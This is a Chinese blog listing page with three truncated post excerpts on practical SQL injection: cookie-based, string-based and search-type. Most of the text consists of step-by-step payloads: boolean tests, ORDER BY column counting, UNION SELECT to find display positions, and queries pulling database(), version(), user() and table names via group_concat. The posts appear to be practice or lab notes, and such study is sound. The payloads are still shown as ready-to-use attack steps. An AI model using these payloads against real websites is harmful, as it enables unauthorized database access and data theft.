实战cookie注入
摘要:第一步:登录账号,获取cookie 第二步:抓包发送repeater 第三步:测试是否存在注入点 payload:' and 1=1 # 第四步:查看多少张表 payload:' order by 4 # 第五步:查看显示位 payload:-admin' union select 1,2,3 #
阅读全文
posted @
2025-01-07 17:03
Ad1ey
阅读(2)
推荐(0) 编辑
实战字符串注入
摘要:1.-1 ' order by 3 %23 2.-1 ' union select 1,2,3 %23 3.-1 ' union select 1,database(),version() %23 4.-1 ' union select 1,group_concat(table_name),3 fr
阅读全文
posted @
2025-01-06 20:27
Ad1ey
阅读(2)
推荐(0) 编辑
实战搜索型注入
摘要:payload:% payload:aa' or 1=1 # payload:%' order by 5 # payload:%' order by 6 # payload:%' union select 1,2,3,4,5 # payload:%' union select 1,user(),ve
阅读全文
posted @
2025-01-05 01:48
Ad1ey
阅读(3)
推荐(0) 编辑
